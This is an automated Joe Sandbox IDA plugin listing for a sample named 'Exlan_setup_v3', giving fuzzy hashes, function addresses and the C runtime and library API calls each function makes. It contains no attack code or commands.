Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$_malloc
String ID:
API String ID: 3153320871-0
Opcode ID: 3a8ae90a2bfb1c0e9c5d20bc0f7ed2092ee2effb4e011fa1c74db3101ee7d2ec
Instruction ID: f1c6c81c0ad183958271ad24207924cd79e6377b832541913e5d6036958eeb11
Opcode Fuzzy Hash: 3a8ae90a2bfb1c0e9c5d20bc0f7ed2092ee2effb4e011fa1c74db3101ee7d2ec
Instruction Fuzzy Hash: 9031A9B1904608ABD704DF99D940E9AF7F8FF48750F11C26EE91997740EB70AA04CBE1

Function 6CFCDC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6CFCDCC5

Part of subcall function 6D009533: std::exception::_Copy_str.LIBCMT ref: 6D00954E

__CxxThrowException@8.LIBCMT ref: 6CFCDCDA

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Part of subcall function 6D009BB5: _malloc.LIBCMT ref: 6D009BCF

std::exception::exception.LIBCMT ref: 6CFCDD09
__CxxThrowException@8.LIBCMT ref: 6CFCDD1E

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 399550787-0
Opcode ID: 187c7025fc69d3ed834f52d42241a88767ea838d3b288aaed2840fe60b5cf938
Instruction ID: 578d4ab5588a36f3deb5e01d5f1eb1872dd0360b6811b13a44e73a8d2f8dd129
Opcode Fuzzy Hash: 187c7025fc69d3ed834f52d42241a88767ea838d3b288aaed2840fe60b5cf938
Instruction Fuzzy Hash: 6A3152B5E04209AFE704CF99E840A9EBBF8FF58310F45855DE91997350D770EA04CBA1

Function 6D012645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D012653

Part of subcall function 6D009D66: __FF_MSGBANNER.LIBCMT ref: 6D009D7F
Part of subcall function 6D009D66: __NMSG_WRITE.LIBCMT ref: 6D009D86
Part of subcall function 6D009D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D009BD4,6CFA1290,5A45ABCE), ref: 6D009DAB

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 24ec34fe67df29d8df9b08aeb858433932d9f56fbdcb858c3165d4adbe5f02bc
Instruction ID: 3678b722cb02ba0d9f165943387c9ded771d87f2be940ba9cb8a9c1106d4cf9c
Opcode Fuzzy Hash: 24ec34fe67df29d8df9b08aeb858433932d9f56fbdcb858c3165d4adbe5f02bc
Instruction Fuzzy Hash: FF11B23254D215BBFB311FB4AC05B5D37E5AF473A5F214029E948975C0EB30C88187A8

Function 6CFC5A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CFC5AB9
VariantCopy.OLEAUT32(?,6D039C90), ref: 6CFC5AC1
VariantClear.OLEAUT32(?), ref: 6CFC5AE2
__CxxThrowException@8.LIBCMT ref: 6CFC5AEF

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 2338f98a62886ceff8cf966108487518e6dbc7764a90e0df0113241cb64d9f83
Instruction ID: 1ef0ed92cc481a4b50a26133cb0d1998ca30235c7ea52f307873bf8510b76bbb
Opcode Fuzzy Hash: 2338f98a62886ceff8cf966108487518e6dbc7764a90e0df0113241cb64d9f83
Instruction Fuzzy Hash: B411CB72A05669BFDB00DF99C8C4ADFBB78FB45614F61426AF914A3700C7749D048BE1

Function 6CFD8D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6CFD8D8A

Part of subcall function 6D009D66: __FF_MSGBANNER.LIBCMT ref: 6D009D7F
Part of subcall function 6D009D66: __NMSG_WRITE.LIBCMT ref: 6D009D86
Part of subcall function 6D009D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D009BD4,6CFA1290,5A45ABCE), ref: 6D009DAB

Part of subcall function 6D0091F6: std::_Lockit::_Lockit.LIBCPMT ref: 6D009202

_malloc.LIBCMT ref: 6CFD8DAF
std::exception::exception.LIBCMT ref: 6CFD8DD4
__CxxThrowException@8.LIBCMT ref: 6CFD8DEB

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
String ID:
API String ID: 3043633502-0
Opcode ID: afe989efadba7e448ed0968bde4ee6906854b6ac24c65afbd402b5bc35720961
Instruction ID: 73d8542c1dded1ec2ca5830dd733a715e27b5da3b1b8fac96e0df242d2a36bc0
Opcode Fuzzy Hash: afe989efadba7e448ed0968bde4ee6906854b6ac24c65afbd402b5bc35720961
Instruction Fuzzy Hash: 60F0247280921177F200EF56BC51FAF36B89F95714F4A082DFA5493180EB20E208C6F3

Function 6CFAF190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4760: __CxxThrowException@8.LIBCMT ref: 6CFA47F9

Part of subcall function 6CFD8D80: _malloc.LIBCMT ref: 6CFD8D8A
Part of subcall function 6CFD8D80: _malloc.LIBCMT ref: 6CFD8DAF

_memcpy_s.LIBCMT ref: 6CFAF282
_memset.LIBCMT ref: 6CFAF293

Strings

@, xrefs: 6CFAF2DE

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @
API String ID: 3081897325-2766056989
Opcode ID: 2a09121a04902fde25b0340586db7d30775efcd9de36e11a62a35feb2a467ffc
Instruction ID: bb740a45b2780797afef8e002e2416be27da3f7e5a8a5e38e306f8577c8dd4d2
Opcode Fuzzy Hash: 2a09121a04902fde25b0340586db7d30775efcd9de36e11a62a35feb2a467ffc
Instruction Fuzzy Hash: 70519CB1905248EFEB10CFA4D980BDEFBB4BF45308F148199D9496B381DB716A49CF92

Function 6CFA4E80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFA4EFC
std::_Xinvalid_argument.LIBCPMT ref: 6CFA4F16

Part of subcall function 6CFA4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4DA9
Part of subcall function 6CFA4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4DCA
Part of subcall function 6CFA4D90: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4DE5

Strings

string too long, xrefs: 6CFA4EF7, 6CFA4F11

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_
String ID: string too long
API String ID: 909987262-2556327735
Opcode ID: 663590e44d8e521b13efd5a3cff4dcb30b6caaced8cfe785e8f8e97f1881a727
Instruction ID: 7a8029d1f0ca35a4d915aa55be94ffa9b6daa1044530c0d4a0956ece2f3af190
Opcode Fuzzy Hash: 663590e44d8e521b13efd5a3cff4dcb30b6caaced8cfe785e8f8e97f1881a727
Instruction Fuzzy Hash: 27310932310610DBE7259EDCE480AAEFBE9EFD5720720952FE555CBA81CF71984683A1

Function 6CFA18C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

__CxxThrowException@8.LIBCMT ref: 6CFA194F

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

std::exception::exception.LIBCMT ref: 6CFA198E

Part of subcall function 6D0095C1: std::exception::operator=.LIBCMT ref: 6D0095DA

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4067

Strings

Clone() is not implemented yet., xrefs: 6CFA18ED

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrowstd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 1131504612-226299721
Opcode ID: 9a5de7fcb537a1b0a475e28eda1edab72b09d9efc34639e7d79df52d9f700683
Instruction ID: e24dbf0d0a5ba82e29d213a635512b4bf2c855f2f6c640396f4861959cfcc8f0
Opcode Fuzzy Hash: 9a5de7fcb537a1b0a475e28eda1edab72b09d9efc34639e7d79df52d9f700683
Instruction Fuzzy Hash: 57312DB1805248FFEB14CFD9D840BEEFBB8EB19714F10466EE425A7781DB7455088B91

Function 6CFD5560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

__CxxThrowException@8.LIBCMT ref: 6CFD5657

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Strings

InputBuffer, xrefs: 6CFD55BF
StringStore: missing InputBuffer argument, xrefs: 6CFD55E0

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: 54bebd6e97a9f46253e3288caf5c34924ca72e202106edc0d25e21798f11392e
Instruction ID: 8cef4fec60188279a4c6b8aef73520ee763683e1c7a259ffed44def44dc0cc2f
Opcode Fuzzy Hash: 54bebd6e97a9f46253e3288caf5c34924ca72e202106edc0d25e21798f11392e
Instruction Fuzzy Hash: 2F4127B150C7809FD310CF6AD490B5BFBE4BB99714F544A2EF59983381DB74A908CB52

Function 6CFA1EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

__CxxThrowException@8.LIBCMT ref: 6CFA1F36

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

std::exception::exception.LIBCMT ref: 6CFA1F6E

Part of subcall function 6D0095C1: std::exception::operator=.LIBCMT ref: 6D0095DA

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA4067

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6CFA1ED4

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrowstd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 1131504612-3625584042
Opcode ID: 7587aa767b71b5b096901c621f6ae9a43f4239345dacc3e50cbd5fb1004294d8
Instruction ID: 39cc140ddff34ac202459fef21f3687853ab7bd3701e86111805fc06cb47d4f3
Opcode Fuzzy Hash: 7587aa767b71b5b096901c621f6ae9a43f4239345dacc3e50cbd5fb1004294d8
Instruction Fuzzy Hash: 84315071805248EFDB14CF99D840BAEFBB8FB19714F10466EE42597781DB749508CB50

Function 6CFB5750 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFB576B

Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D0090ED
Part of subcall function 6D0090D8: __CxxThrowException@8.LIBCMT ref: 6D009102
Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D009113

std::_Xinvalid_argument.LIBCPMT ref: 6CFB5782

Strings

string too long, xrefs: 6CFB5766, 6CFB577D

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: b1025792d44c161838c4319d0b99be5cfba241a583733b6e06f4325b690e74bd
Instruction ID: bef5ca2412349a17ab7c9013eceb08a73df954f044f7bfb7fb24a942eea57a40
Opcode Fuzzy Hash: b1025792d44c161838c4319d0b99be5cfba241a583733b6e06f4325b690e74bd
Instruction Fuzzy Hash: E111E9333056149FE321DA9EF880B6AF7EDEF95664F30061FE552D7A80C7B5980483A1

Function 6CFC5810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFC584D

Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D0090ED
Part of subcall function 6D0090D8: __CxxThrowException@8.LIBCMT ref: 6D009102
Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D009113

VariantClear.OLEAUT32(00000000), ref: 6CFC5899

Strings

vector<T> too long, xrefs: 6CFC5848

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$ClearException@8ThrowVariantXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 2677079660-3788999226
Opcode ID: a3acd225add01221a70ce796d3e1e3f6d7ccf3ec6fb36d04da951cffd85aaa57
Instruction ID: cdf741f21c2ecdadf6bafe73a447169e5f341b274f1f4f0ca7311f861231d80f
Opcode Fuzzy Hash: a3acd225add01221a70ce796d3e1e3f6d7ccf3ec6fb36d04da951cffd85aaa57
Instruction Fuzzy Hash: FF21A172B056069FD710CF69D880A6FB7F9EF88364F25462EE45993B80D730A9008B91

Function 6CFB0150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6CFA4010: std::_Xinvalid_argument.LIBCPMT ref: 6CFA402A

__CxxThrowException@8.LIBCMT ref: 6CFB0201

Part of subcall function 6D00AC75: RaiseException.KERNEL32(?,?,6D009C34,5A45ABCE,?,?,?,?,6D009C34,5A45ABCE,6D039C90,6D04B974,5A45ABCE), ref: 6D00ACB7

Strings

StringSink: OutputStringPointer not specified, xrefs: 6CFB019B
OutputStringPointer, xrefs: 6CFB018C

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: OutputStringPointer$StringSink: OutputStringPointer not specified
API String ID: 3718517217-1331214609
Opcode ID: f88a9890598f5dfb60896daf89ce97ed080a164c87845738d71d8b72046e997d
Instruction ID: ba4b36a7bf89a5c7f5654840450e5fe970111a6b512ccf51a73996078be81755
Opcode Fuzzy Hash: f88a9890598f5dfb60896daf89ce97ed080a164c87845738d71d8b72046e997d
Instruction Fuzzy Hash: BB213D71D05248AFEB05DFD9D990BEDFBB4EB09314F10825AE425A7681DB356508CB50

Function 6CFA4620 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFA4636

Part of subcall function 6D009125: std::exception::exception.LIBCMT ref: 6D00913A
Part of subcall function 6D009125: __CxxThrowException@8.LIBCMT ref: 6D00914F
Part of subcall function 6D009125: std::exception::exception.LIBCMT ref: 6D009160

_memmove.LIBCMT ref: 6CFA466F

Strings

invalid string position, xrefs: 6CFA4631

Memory Dump Source

Source File: 00000000.00000002.1696095617.000000006CFA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CFA0000, based on PE: true

Associated: 00000000.00000002.1696055431.000000006CFA0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696394994.000000006D024000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696620042.000000006D03E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696664721.000000006D040000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696698493.000000006D041000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696722771.000000006D043000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696756624.000000006D04A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1696783690.000000006D04E000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cfa0000_Exlan_setup_v3.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
String ID: invalid string position
API String ID: 1785806476-1799206989
Opcode ID: 4e907169ee3ecab1ea5c0261936218fdd0d3bc1e58ce5dfd52e3340792b22053
Instruction ID: b1ef97c50edfdf7716c2743cc3babe557aaa4b91520879b27f4459d06c85480f
Opcode Fuzzy Hash: 4e907169ee3ecab1ea5c0261936218fdd0d3bc1e58ce5dfd52e3340792b22053
Instruction Fuzzy Hash: 0D01D632304240DBD3248EECEC80A5AFBBAEBD5754B24492DD195CBB11DAB1EC4287A1

Function 6CFB5160 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CFB5173

Part of subcall function 6D0090D8: std::exception::exception.LIBCMT ref: 6D0090ED
